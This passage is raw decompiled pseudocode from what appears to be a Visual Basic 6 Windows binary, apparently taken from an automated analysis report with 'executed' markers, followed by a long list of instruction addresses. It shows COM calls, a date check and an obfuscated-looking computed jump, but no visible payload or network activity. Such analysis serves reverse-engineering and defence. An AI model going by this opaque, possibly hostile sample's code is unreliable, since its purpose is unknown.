						_v984 = 0x425010;
					}
					_t2224 =  &_v236;
					L004017C4();
					_v500 = _t2224;
					_t2228 =  *((intOrPtr*)( *_v500 + 0x140))(_v500,  &_v224, _t2224,  *((intOrPtr*)( *((intOrPtr*)( *_v984)) + 0x30c))( *_v984));
					asm("fclex");
					_v504 = _t2228;
					if(_v504 >= 0) {
						_v988 = _v988 & 0x00000000;
					} else {
						_push(0x140);
						_push(0x405050);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v988 = _t2228;
					}
					_push(0x3a);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x52;
					_push(0x3b);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x53;
					_push(0x3c);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x54;
					_push(0x3d);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x55;
					if( *0x425010 != 0) {
						_v992 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v992 = 0x425010;
					}
					_t2232 =  &_v236;
					L004017C4();
					_v500 = _t2232;
					_t2236 =  *((intOrPtr*)( *_v500 + 0x180))(_v500,  &_v240, _t2232,  *((intOrPtr*)( *((intOrPtr*)( *_v992)) + 0x304))( *_v992));
					asm("fclex");
					_v504 = _t2236;
					if(_v504 >= 0) {
						_v996 = _v996 & 0x00000000;
					} else {
						_push(0x180);
						_push(0x4050b0);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v996 = _t2236;
					}
					_push(0);
					_push(0);
					_push(_v240);
					_t2237 =  &_v276;
					_push(_t2237);
					L004017CA();
					_push(_t2237);
					L00401728();
					L00401752();
					_push(0x3e);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					_push( &_v240);
					_push( &_v236);
					_push(2);
					L004017A6();
					_t2811 = _t2818 + 0x1c;
					L00401794();
					_v8 = 0x56;
					_push(0x3f);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x57;
					if( *0x425010 != 0) {
						_v1000 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v1000 = 0x425010;
					}
					_t2243 =  &_v236;
					L004017C4();
					_v500 = _t2243;
					_t2247 =  *((intOrPtr*)( *_v500 + 0xa8))(_v500,  &_v224, _t2243,  *((intOrPtr*)( *((intOrPtr*)( *_v1000)) + 0x308))( *_v1000));
					asm("fclex");
					_v504 = _t2247;
					if(_v504 >= 0) {
						_v1004 = _v1004 & 0x00000000;
					} else {
						_push(0xa8);
						_push(0x405050);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v1004 = _t2247;
					}
					_push(0x40);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x58;
					_push(0x41);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x59;
					_push(0x42);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x5a;
					_push(0x43);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x5b;
					_push(0x44);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x5c;
					_v8 = 0x5d;
					if( *0x425698 != 0) {
						_v1008 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405090);
						L004017BE();
						_v1008 = 0x425698;
					}
					_v500 =  *_v1008;
					_v400 = L"Grundbog1";
					_v408 = 8;
					_v384 = 0x93;
					_v392 = 2;
					L00401530();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401530();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t2255 =  *((intOrPtr*)( *_v500 + 0x38))(_v500, 0x10, 0x10,  &_v276);
					asm("fclex");
					_v504 = _t2255;
					if(_v504 >= 0) {
						_v1012 = _v1012 & 0x00000000;
					} else {
						_push(0x38);
						_push(0x405080);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v1012 = _t2255;
					}
					_push( &_v276);
					_push( &_v376);
					L0040171C();
					_push( &_v376);
					_push( &_v172);
					L00401722();
					L00401794();
				}
				_v8 = 0x5f;
				if( *0x425010 != 0) {
					_v1016 = 0x425010;
				} else {
					_push(0x425010);
					_push(0x404370);
					L004017BE();
					_v1016 = 0x425010;
				}
				_t1825 =  &_v236;
				L004017C4();
				_v500 = _t1825;
				_v384 = 1;
				_v392 = 2;
				L00401530();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t1829 =  *((intOrPtr*)( *_v500 + 0x200))(_v500, 0x10, _t1825,  *((intOrPtr*)( *((intOrPtr*)( *_v1016)) + 0x304))( *_v1016));
				asm("fclex");
				_v504 = _t1829;
				if(_v504 >= 0) {
					_v1020 = _v1020 & 0x00000000;
				} else {
					_push(0x200);
					_push(0x4050b0);
					_push(_v500);
					_push(_v504);
					L004017B8();
					_v1020 = _t1829;
				}
				L0040178E();
				_v8 = 0x60;
				_v268 = 0x20;
				_v276 = 2;
				_t1830 =  &_v276;
				_push(_t1830);
				_push(1);
				L00401710();
				L00401752();
				_push(_t1830);
				_push(0x405524);
				L00401716();
				asm("sbb eax, eax");
				_v500 =  ~( ~( ~_t1830));
				L00401740();
				L00401794();
				if(_v500 != 0) {
					_v8 = 0x61;
					if( *0x425698 != 0) {
						_v1024 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405090);
						L004017BE();
						_v1024 = 0x425698;
					}
					_v500 =  *_v1024;
					_t1909 =  *((intOrPtr*)( *_v500 + 0x14))(_v500,  &_v236);
					asm("fclex");
					_v504 = _t1909;
					if(_v504 >= 0) {
						_v1028 = _v1028 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405080);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v1028 = _t1909;
					}
					_v508 = _v236;
					_t1914 =  *((intOrPtr*)( *_v508 + 0xf8))(_v508,  &_v224);
					asm("fclex");
					_v512 = _t1914;
					if(_v512 >= 0) {
						_v1032 = _v1032 & 0x00000000;
					} else {
						_push(0xf8);
						_push(0x4050c0);
						_push(_v508);
						_push(_v512);
						L004017B8();
						_v1032 = _t1914;
					}
					_v592 = _v224;
					_v224 = _v224 & 0x00000000;
					L00401752();
					L0040178E();
					_v8 = 0x62;
					if( *0x425698 != 0) {
						_v1036 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405090);
						L004017BE();
						_v1036 = 0x425698;
					}
					_v500 =  *_v1036;
					_t1921 =  *((intOrPtr*)( *_v500 + 0x14))(_v500,  &_v236);
					asm("fclex");
					_v504 = _t1921;
					if(_v504 >= 0) {
						_v1040 = _v1040 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405080);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v1040 = _t1921;
					}
					_v508 = _v236;
					_t1926 =  *((intOrPtr*)( *_v508 + 0x130))(_v508,  &_v224);
					asm("fclex");
					_v512 = _t1926;
					if(_v512 >= 0) {
						_v1044 = _v1044 & 0x00000000;
					} else {
						_push(0x130);
						_push(0x4050c0);
						_push(_v508);
						_push(_v512);
						L004017B8();
						_v1044 = _t1926;
					}
					_v596 = _v224;
					_v224 = _v224 & 0x00000000;
					L00401752();
					L0040178E();
					_v8 = 0x63;
					_v8 = 0x64;
					if( *0x425010 != 0) {
						_v1048 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v1048 = 0x425010;
					}
					_t1931 =  &_v236;
					L004017C4();
					_v500 = _t1931;
					_t1935 =  *((intOrPtr*)( *_v500 + 0x178))(_v500,  &_v240, _t1931,  *((intOrPtr*)( *((intOrPtr*)( *_v1048)) + 0x30c))( *_v1048));
					asm("fclex");
					_v504 = _t1935;
					if(_v504 >= 0) {
						_v1052 = _v1052 & 0x00000000;
					} else {
						_push(0x178);
						_push(0x405050);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v1052 = _t1935;
					}
					_push(0);
					_push(0);
					_push(_v240);
					_push( &_v276);
					L004017CA();
					_t2813 = _t2811 + 0x10;
					if( *0x425010 != 0) {
						_v1056 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v1056 = 0x425010;
					}
					_t1940 =  &_v244;
					L004017C4();
					_v508 = _t1940;
					_t1944 =  *((intOrPtr*)( *_v508 + 0x48))(_v508,  &_v224, _t1940,  *((intOrPtr*)( *((intOrPtr*)( *_v1056)) + 0x304))( *_v1056));
					asm("fclex");
					_v512 = _t1944;
					if(_v512 >= 0) {
						_v1060 = _v1060 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x4050b0);
						_push(_v508);
						_push(_v512);
						L004017B8();
						_v1060 = _t1944;
					}
					if( *0x425698 != 0) {
						_v1064 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405090);
						L004017BE();
						_v1064 = 0x425698;
					}
					_v516 =  *_v1064;
					_t1950 =  *((intOrPtr*)( *_v516 + 0x4c))(_v516,  &_v248);
					asm("fclex");
					_v520 = _t1950;
					if(_v520 >= 0) {
						_v1068 = _v1068 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x405080);
						_push(_v516);
						_push(_v520);
						L004017B8();
						_v1068 = _t1950;
					}
					_v524 = _v248;
					_t1953 =  &_v276;
					L00401728();
					L00401752();
					_t1956 =  *((intOrPtr*)( *_v524 + 0x24))(_v524, _t1953, _t1953, _v224,  &_v232);
					asm("fclex");
					_v528 = _t1956;
					if(_v528 >= 0) {
						_v1072 = _v1072 & 0x00000000;
					} else {
						_push(0x24);
						_push(0x4050a0);
						_push(_v524);
						_push(_v528);
						L004017B8();
						_v1072 = _t1956;
					}
					_v600 = _v232;
					_v232 = _v232 & 0x00000000;
					L00401752();
					_push( &_v224);
					_push( &_v228);
					_push(2);
					L0040170A();
					_push( &_v248);
					_push( &_v240);
					_push( &_v244);
					_push( &_v236);
					_push(4);
					L004017A6();
					_t2811 = _t2813 + 0x20;
					L00401794();
				}
				_v8 = 0x66;
				_v384 = L"01/01/01";
				_v392 = 8;
				_t2643 =  &_v392;
				_t2370 =  &_v276;
				L004016F8();
				_push( &_v276);
				_push( &_v292); // executed
				L004016FE(); // executed
				_v400 = 0x7d1;
				_v408 = 0x8002;
				_push( &_v292);
				_t1838 =  &_v408;
				_push(_t1838);
				L00401704();
				_v500 = _t1838;
				_push( &_v292);
				_push( &_v276);
				_push(2);
				L004017A0();
				if(_v500 != 0) {
					_v8 = 0x67;
					_v268 = 0x80020004;
					_v276 = 0xa;
					_t1899 =  &_v276;
					L0040179A();
					_v212 = _t1899;
					L00401794();
					_v8 = 0x68;
					_v268 = 2;
					_v276 = 2;
					_t1900 =  &_v276;
					L004016F2();
					_t2643 = _t1900;
					L00401752();
					_t2370 =  &_v276;
					L00401794();
					_v8 = 0x69;
					_t1903 =  *((intOrPtr*)( *_a4 + 0x254))(_a4, 0x6621, _t1900, _t1899);
					asm("fclex");
					_v500 = _t1903;
					_t2947 = _v500;
					if(_t2947 >= 0) {
						_v1076 = _v1076 & 0x00000000;
					} else {
						_push(0x254);
						_push(0x404b0c);
						_push(_a4);
						_push(_v500);
						L004017B8();
						_v1076 = _t1903;
					}
				}
				_v8 = 0x6b;
				asm("fldz");
				_push(_t2370);
				_push(_t2370);
				_v364 = _t2951;
				L004016E6();
				L004016EC();
				asm("fcomp qword [0x401400]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t2947 != 0) {
					_v8 = 0x6c;
					_t1898 =  &_v276;
					_push(_t1898);
					L004016E0();
					_t2643 =  &_v276;
					L00401764();
					_v8 = 0x6d;
					_push(0xffffffff);
					L004016DA();
					_v8 = 0x6e;
					_v8 = 0x6f;
					_push(0xde);
					L00401788();
					_v64 = _t1898;
				}
				_v8 = 0x71;
				_t1844 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
				_v500 = _t1844;
				if(_v500 >= 0) {
					_v1080 = _v1080 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x404b3c);
					_push(_a4);
					_push(_v500);
					L004017B8();
					_v1080 = _t1844;
				}
				_v8 = 0x72;
				 *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v480);
				_v100 = _v480;
				_v8 = 0x73;
				_v496 = 0x71c81fd0;
				_v492 = 0x5af8;
				 *((intOrPtr*)( *_a4 + 0x70c))(_a4,  &_v496, 0x4daa7940, 0x5b02);
				_v8 = 0x74;
				 *((intOrPtr*)( *_a4 + 0x710))(_a4);
				_v8 = 0x75;
				_t1858 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4);
				_v500 = _t1858;
				if(_v500 >= 0) {
					_v1084 = _v1084 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x404b3c);
					_push(_a4);
					_push(_v500);
					L004017B8();
					_v1084 = _t1858;
				}
				_v8 = 0x76;
				_v384 = 1;
				_v392 = 2;
				_v400 = 0xa10f;
				_v408 = 3;
				_v416 = _v416 & 0x00000000;
				_v424 = 2;
				_push( &_v392);
				_push( &_v408);
				_push( &_v424);
				_push( &_v564);
				_push( &_v548);
				_t1864 =  &_v52;
				_push(_t1864);
				L004016D4();
				_v604 = _t1864;
				while(_v604 != 0) {
					_v8 = 0x77;
					 *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v480);
					_v208 = _v480;
					_v8 = 0x78;
					 *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v476);
					_v204 = _v476;
					_v8 = 0x79;
					_t1877 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v480);
					_v500 = _t1877;
					if(_v500 >= 0) {
						_v1088 = _v1088 & 0x00000000;
					} else {
						_push(0x700);
						_push(0x404b3c);
						_push(_a4);
						_push(_v500);
						L004017B8();
						_v1088 = _t1877;
					}
					_v200 = _v480;
					_v8 = 0x7a;
					 *((intOrPtr*)( *_a4 + 0x71c))(_a4,  &_v480);
					_v92 = _v480;
					_v8 = 0x7b;
					if( *0x425010 != 0) {
						_v1092 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v1092 = 0x425010;
					}
					_t1886 =  &_v236;
					L004017C4();
					_v500 = _t1886;
					_t1890 =  *((intOrPtr*)( *_v500 + 0x190))(_v500,  &_v224, _t1886,  *((intOrPtr*)( *((intOrPtr*)( *_v1092)) + 0x304))( *_v1092));
					asm("fclex");
					_v504 = _t1890;
					if(_v504 >= 0) {
						_v1096 = _v1096 & 0x00000000;
					} else {
						_push(0x190);
						_push(0x4050b0);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v1096 = _t1890;
					}
					_v496 =  *0x4013f8;
					 *((intOrPtr*)( *_a4 + 0x720))(_a4,  &_v496, _v224);
					L00401740();
					L0040178E();
					_v8 = 0x7c;
					_push( &_v564);
					_push( &_v548);
					_t1897 =  &_v52;
					_push(_t1897);
					L004016CE();
					_v604 = _t1897;
				}
				_v8 = 0x7d;
				_v384 = 0xaa47e;
				_t2644 =  >=  ? 0x410096 : _t2643;
				_push( >=  ? 0x410096 : _t2643);
				goto ( *__esp);
			}

0x00414206
0x00414212
0x0041421a
0x0041421d
0x0041422a
0x00414232
0x00414235
0x00414244
0x00414247
0x0041424e
0x0041425c
0x00414279
0x0041425e
0x0041425e
0x00414263
0x00414268
0x0041426d
0x0041426d
0x0041429d
0x004142a4
0x004142a9
0x004142c4
0x004142ca
0x004142cc
0x004142d9
0x004142fe
0x004142db
0x004142db
0x004142e0
0x004142e5
0x004142eb
0x004142f1
0x004142f6
0x004142f6
0x00414305
0x00414307
0x00414309
0x00414315
0x00414316
0x0041431b
0x00414325
0x00414342
0x00414327
0x00414327
0x0041432c
0x00414331
0x00414336
0x00414336
0x00414366
0x0041436d
0x00414372
0x0041438d
0x00414393
0x00414395
0x004143a2
0x004143c7
0x004143a4
0x004143a4
0x004143a9
0x004143ae
0x004143b4
0x004143ba
0x004143bf
0x004143bf
0x004143ce
0x004143d0
0x004143d2
0x004143de
0x004143df
0x004143e4
0x004143ee
0x0041440b
0x004143f0
0x004143f0
0x004143f5
0x004143fa
0x004143ff
0x004143ff
0x0041442f
0x00414436
0x0041443b
0x00414456
0x0041445c
0x0041445e
0x0041446b
0x00414490
0x0041446d
0x0041446d
0x00414472
0x00414477
0x0041447d
0x00414483
0x00414488
0x00414488
0x00414497
0x00414499
0x0041449b
0x004144a1
0x004144a7
0x004144a8
0x004144ad
0x004144b0
0x004144b1
0x004144b6
0x004144b7
0x004144bd
0x004144be
0x004144c3
0x004144c4
0x004144ca
0x004144cb
0x004144d0
0x004144d1
0x004144d6
0x004144dc
0x004144e8
0x00414505
0x004144ea
0x004144ea
0x004144ef
0x004144f4
0x004144f9
0x004144f9
0x00414529
0x00414530
0x00414535
0x00414550
0x00414553
0x00414555
0x00414562
0x00414584
0x00414564
0x00414564
0x00414566
0x0041456b
0x00414571
0x00414577
0x0041457c
0x0041457c
0x00414599
0x0041459e
0x004145ab
0x004145b2
0x004145b9
0x004145c0
0x004145c7
0x004145ce
0x004145d5
0x004145d6
0x004145d8
0x004145e6
0x004145ed
0x004145f4
0x004145f5
0x004145f7
0x004145fc
0x00414608
0x0041460e
0x00414615
0x0041461f
0x00414629
0x0041462f
0x00414630
0x00414635
0x00414642
0x00414647
0x00414655
0x00414672
0x00414657
0x00414657
0x0041465c
0x00414661
0x00414666
0x00414666
0x00414684
0x0041469f
0x004146a2
0x004146a4
0x004146b1
0x004146d3
0x004146b3
0x004146b3
0x004146b5
0x004146ba
0x004146c0
0x004146c6
0x004146cb
0x004146cb
0x004146e0
0x004146f4
0x004146f7
0x004146f9
0x00414706
0x00414728
0x00414708
0x00414708
0x0041470a
0x0041470f
0x00414715
0x0041471b
0x00414720
0x00414720
0x00414735
0x0041473a
0x00414741
0x00414748
0x0041474a
0x0041474f
0x0041474f
0x00414752
0x00414760
0x0041477d
0x00414762
0x00414762
0x00414767
0x0041476c
0x00414771
0x00414771
0x004147a1
0x004147a8
0x004147ad
0x004147c8
0x004147ce
0x004147d0
0x004147dd
0x00414802
0x004147df
0x004147df
0x004147e4
0x004147e9
0x004147ef
0x004147f5
0x004147fa
0x004147fa
0x00414810
0x0041482d
0x00414812
0x00414812
0x00414817
0x0041481c
0x00414821
0x00414821
0x00414851
0x00414858
0x0041485d
0x00414878
0x0041487e
0x00414880
0x0041488d
0x004148b2
0x0041488f
0x0041488f
0x00414894
0x00414899
0x0041489f
0x004148a5
0x004148aa
0x004148aa
0x004148b9
0x004148bb
0x004148bd
0x004148c9
0x004148ca
0x004148cf
0x004148d9
0x004148f6
0x004148db
0x004148db
0x004148e0
0x004148e5
0x004148ea
0x004148ea
0x0041491a
0x00414921
0x00414926
0x00414941
0x00414947
0x00414949
0x00414956
0x0041497b
0x00414958
0x00414958
0x0041495d
0x00414962
0x00414968
0x0041496e
0x00414973
0x00414973
0x00414982
0x00414984
0x00414986
0x00414992
0x00414993
0x00414998
0x004149a2
0x004149bf
0x004149a4
0x004149a4
0x004149a9
0x004149ae
0x004149b3
0x004149b3
0x004149e3
0x004149ea
0x004149ef
0x00414a0a
0x00414a10
0x00414a12
0x00414a1f
0x00414a44
0x00414a21
0x00414a21
0x00414a26
0x00414a2b
0x00414a31
0x00414a37
0x00414a3c
0x00414a3c
0x00414a51
0x00414a52
0x00414a5e
0x00414a62
0x00414a63
0x00414a69
0x00414a6a
0x00414a6f
0x00414a70
0x00414a76
0x00414a77
0x00414a7c
0x00414a7d
0x00414a83
0x00414a88
0x00414a8e
0x00414aa4
0x00414ab1
0x00414ab8
0x00414abf
0x00414ac6
0x00414acd
0x00414ad4
0x00414ad5
0x00414ad7
0x00414ae5
0x00414aec
0x00414aed
0x00414aef
0x00414af4
0x00414b00
0x00414b06
0x00414b14
0x00414b31
0x00414b16
0x00414b16
0x00414b1b
0x00414b20
0x00414b25
0x00414b25
0x00414b43
0x00414b5e
0x00414b61
0x00414b63
0x00414b70
0x00414b92
0x00414b72
0x00414b72
0x00414b74
0x00414b79
0x00414b7f
0x00414b85
0x00414b8a
0x00414b8a
0x00414b9f
0x00414bba
0x00414bbd
0x00414bbf
0x00414bcc
0x00414bee
0x00414bce
0x00414bce
0x00414bd0
0x00414bd5
0x00414bdb
0x00414be1
0x00414be6
0x00414be6
0x00414bfc
0x00414c06
0x00414c0b
0x00414c19
0x00414c36
0x00414c1b
0x00414c1b
0x00414c20
0x00414c25
0x00414c2a
0x00414c2a
0x00414c48
0x00414c63
0x00414c66
0x00414c68
0x00414c75
0x00414c97
0x00414c77
0x00414c77
0x00414c79
0x00414c7e
0x00414c84
0x00414c8a
0x00414c8f
0x00414c8f
0x00414ca4
0x00414cbf
0x00414cc5
0x00414cc7
0x00414cd4
0x00414cf9
0x00414cd6
0x00414cd6
0x00414cdb
0x00414ce0
0x00414ce6
0x00414cec
0x00414cf1
0x00414cf1
0x00414d07
0x00414d11
0x00414d16
0x00414d24
0x00414d41
0x00414d26
0x00414d26
0x00414d2b
0x00414d30
0x00414d35
0x00414d35
0x00414d53
0x00414d59
0x00414d5d
0x00414d63
0x00414d6a
0x00414d7e
0x00414d81
0x00414d83
0x00414d90
0x00414db2
0x00414d92
0x00414d92
0x00414d94
0x00414d99
0x00414d9f
0x00414da5
0x00414daa
0x00414daa
0x00414dbf
0x00414dbf
0x00414dc4
0x00414dd2
0x00414def
0x00414dd4
0x00414dd4
0x00414dd9
0x00414dde
0x00414de3
0x00414de3
0x00414e13
0x00414e1a
0x00414e1f
0x00414e33
0x00414e39
0x00414e3b
0x00414e48
0x00414e6d
0x00414e4a
0x00414e4a
0x00414e4f
0x00414e54
0x00414e5a
0x00414e60
0x00414e65
0x00414e65
0x00414e74
0x00414e7a
0x00414e7f
0x00414e86
0x00414e90
0x00414ea0
0x00414ea7
0x00414ea8
0x00414ead
0x00414eb7
0x00414ec7
0x00414ec8
0x00414ece
0x00414ecf
0x00414ed4
0x00414ee1
0x00414ee8
0x00414ee9
0x00414eeb
0x00414ef0
0x00414ef3
0x00414efc
0x00414f02
0x00414f09
0x00414f13
0x00414f1d
0x00414f27
0x00414f31
0x00414f3b
0x00414f4b
0x00414f52
0x00414f59
0x00414f5a
0x00414f60
0x00414f61
0x00414f62
0x00414f65
0x00414f67
0x00414f68
0x00414f69
0x00414f6c
0x00414f6e
0x00414f6f
0x00414f70
0x00414f73
0x00414f78
0x00414f84
0x00414f8b
0x00414f92
0x00414f93
0x00414f95
0x00414f9a
0x00414f9d
0x00414faa
0x00414fab
0x00414fb0
0x00414fb8
0x00414fbf
0x00414fc0
0x00414fce
0x00414fd9
0x00414fde
0x00414fe5
0x00414fec
0x00414ff6
0x00415000
0x0041500a
0x00415014
0x0041501e
0x00415028
0x00415032
0x0041503c
0x00415046
0x00415050
0x0041505a
0x0041506b
0x00415088
0x0041506d
0x0041506d
0x00415072
0x00415077
0x0041507c
0x0041507c
0x004150ac
0x004150b3
0x004150b8
0x004150d3
0x004150d9
0x004150db
0x004150e8
0x0041510d
0x004150ea
0x004150ea
0x004150ef
0x004150f4
0x004150fa
0x00415100
0x00415105
0x00415105
0x0041511a
0x00415120
0x0041512d
0x00415133
0x00415143
0x0041514a
0x00415151
0x00415158
0x0041515f
0x00415166
0x0041516d
0x0041516e
0x00415178
0x00415183
0x0041518e
0x00415195
0x0041519c
0x004151a3
0x004151aa
0x004151b1
0x004151b2
0x004151b8
0x004151b9
0x004151bb
0x004151c0
0x004151c0
0x004151c3
0x004151ca
0x004151cf
0x004151d7
0x004151dd
0x004151eb
0x00415208
0x004151ed
0x004151ed
0x004151f2
0x004151f7
0x004151fc
0x004151fc
0x0041521a
0x00415235
0x00415238
0x0041523a
0x00415247
0x00415269
0x00415249
0x00415249
0x0041524b
0x00415250
0x00415256
0x0041525c
0x00415261
0x00415261
0x00415276
0x0041527c
0x00415286
0x00415297
0x004152b4
0x00415299
0x00415299
0x0041529e
0x004152a3
0x004152a8
0x004152a8
0x004152d8
0x004152df
0x004152e4
0x004152ff
0x00415305
0x00415307
0x00415314
0x00415339
0x00415316
0x00415316
0x0041531b
0x00415320
0x00415326
0x0041532c
0x00415331
0x00415331
0x00415343
0x00415350
0x00415351
0x00415352
0x00415353
0x00415368
0x0041536e
0x00415370
0x0041537d
0x004153a2
0x0041537f
0x0041537f
0x00415384
0x00415389
0x0041538f
0x00415395
0x0041539a
0x0041539a
0x004153af
0x004153ba
0x004153c1
0x004153c2
0x004153c4
0x004153cc
0x004153d3
0x004153d5
0x004153d7
0x004153d9
0x004153e1
0x004153e2
0x004153e4
0x004153e9
0x004153ee
0x004153f1
0x004153fd
0x004153ff
0x00415405
0x0041540e
0x00415413
0x00415421
0x0041543e
0x00415423
0x00415423
0x00415428
0x0041542d
0x00415432
0x00415432
0x00415462
0x00415469
0x0041546e
0x00415489
0x0041548f
0x00415491
0x0041549e
0x004154c3
0x004154a0
0x004154a0
0x004154a5
0x004154aa
0x004154b0
0x004154b6
0x004154bb
0x004154bb
0x004154d0
0x004154d2
0x004154d8
0x004154e1
0x004154ec
0x004154f7
0x004154fc
0x00415508
0x0041550a
0x00415510
0x00415519
0x0041551e
0x0041552a
0x0041552c
0x00415532
0x0041553b
0x00415540
0x0041554e
0x0041556b
0x00415550
0x00415550
0x00415555
0x0041555a
0x0041555f
0x0041555f
0x0041558f
0x00415596
0x0041559b
0x004155b6
0x004155bc
0x004155be
0x004155cb
0x004155f0
0x004155cd
0x004155cd
0x004155d2
0x004155d7
0x004155dd
0x004155e3
0x004155e8
0x004155e8
0x004155fd
0x004155ff
0x00415605
0x0041560e
0x00415619
0x00415624
0x00415629
0x00415637
0x00415654
0x00415639
0x00415639
0x0041563e
0x00415643
0x00415648
0x00415648
0x00415678
0x0041567f
0x00415684
0x0041569f
0x004156a2
0x004156a4
0x004156b1
0x004156d3
0x004156b3
0x004156b3
0x004156b5
0x004156ba
0x004156c0
0x004156c6
0x004156cb
0x004156cb
0x004156e0
0x004156e2
0x004156e8
0x004156f1
0x004156fc
0x00415707
0x0041570c
0x00415718
0x0041571a
0x00415720
0x00415729
0x0041572e
0x0041573a
0x0041573c
0x00415742
0x0041574b
0x00415750
0x0041575c
0x0041575e
0x00415764
0x0041576d
0x00415772
0x0041577e
0x00415780
0x00415786
0x0041578f
0x00415794
0x004157a2
0x004157bf
0x004157a4
0x004157a4
0x004157a9
0x004157ae
0x004157b3
0x004157b3
0x004157e3
0x004157ea
0x004157ef
0x0041580c
0x00415812
0x00415814
0x00415821
0x00415846
0x00415823
0x00415823
0x00415828
0x0041582d
0x00415833
0x00415839
0x0041583e
0x0041583e
0x00415853
0x00415855
0x0041585b
0x00415864
0x0041586f
0x0041587a
0x0041587f
0x0041588d
0x004158aa
0x0041588f
0x0041588f
0x00415894
0x00415899
0x0041589e
0x0041589e
0x004158ce
0x004158d5
0x004158da
0x004158f5
0x004158fb
0x004158fd
0x0041590a
0x0041592f
0x0041590c
0x0041590c
0x00415911
0x00415916
0x0041591c
0x00415922
0x00415927
0x00415927
0x00415936
0x00415938
0x0041593a
0x00415940
0x00415946
0x00415947
0x0041594f
0x00415950
0x0041595d
0x00415964
0x00415966
0x0041596c
0x00415975
0x00415980
0x0041598b
0x00415992
0x00415993
0x00415995
0x0041599a
0x004159a3
0x004159a8
0x004159b6
0x004159d3
0x004159b8
0x004159b8
0x004159bd
0x004159c2
0x004159c7
0x004159c7
0x004159f7
0x004159fe
0x00415a03
0x00415a1e
0x00415a21
0x00415a23
0x00415a30
0x00415a52
0x00415a32
0x00415a32
0x00415a34
0x00415a39
0x00415a3f
0x00415a45
0x00415a4a
0x00415a4a
0x00415a5f
0x00415a61
0x00415a67
0x00415a70
0x00415a7b
0x00415a86
0x00415a8b
0x00415a97
0x00415a99
0x00415a9f
0x00415aa8
0x00415aad
0x00415abb
0x00415ad8
0x00415abd
0x00415abd
0x00415ac2
0x00415ac7
0x00415acc
0x00415acc
0x00415afc
0x00415b03
0x00415b08
0x00415b25
0x00415b2b
0x00415b2d
0x00415b3a
0x00415b5f
0x00415b3c
0x00415b3c
0x00415b41
0x00415b46
0x00415b4c
0x00415b52
0x00415b57
0x00415b57
0x00415b6c
0x00415b6e
0x00415b74
0x00415b7d
0x00415b88
0x00415b93
0x00415b98
0x00415ba4
0x00415ba6
0x00415bac
0x00415bb5
0x00415bba
0x00415bc8
0x00415be5
0x00415bca
0x00415bca
0x00415bcf
0x00415bd4
0x00415bd9
0x00415bd9
0x00415c09
0x00415c10
0x00415c15
0x00415c30
0x00415c36
0x00415c38
0x00415c45
0x00415c6a
0x00415c47
0x00415c47
0x00415c4c
0x00415c51
0x00415c57
0x00415c5d
0x00415c62
0x00415c62
0x00415c77
0x00415c79
0x00415c7f
0x00415c88
0x00415c93
0x00415c9e
0x00415ca3
0x00415caf
0x00415cb1
0x00415cb7
0x00415cc0
0x00415cc5
0x00415cd1
0x00415cd3
0x00415cd9
0x00415ce2
0x00415ce7
0x00415cf3
0x00415cf5
0x00415cfb
0x00415d04
0x00415d09
0x00415d17
0x00415d34
0x00415d19
0x00415d19
0x00415d1e
0x00415d23
0x00415d28
0x00415d28
0x00415d58
0x00415d5f
0x00415d64
0x00415d7f
0x00415d85
0x00415d87
0x00415d94
0x00415db9
0x00415d96
0x00415d96
0x00415d9b
0x00415da0
0x00415da6
0x00415dac
0x00415db1
0x00415db1
0x00415dc6
0x00415dc8
0x00415dce
0x00415dd7
0x00415de2
0x00415ded
0x00415df2
0x00415dfe
0x00415e00
0x00415e06
0x00415e0f
0x00415e14
0x00415e20
0x00415e22
0x00415e28
0x00415e31
0x00415e36
0x00415e44
0x00415e61
0x00415e46
0x00415e46
0x00415e4b
0x00415e50
0x00415e55
0x00415e55
0x00415e85
0x00415e8c
0x00415e91
0x00415eac
0x00415eb2
0x00415eb4
0x00415ec1
0x00415ee6
0x00415ec3
0x00415ec3
0x00415ec8
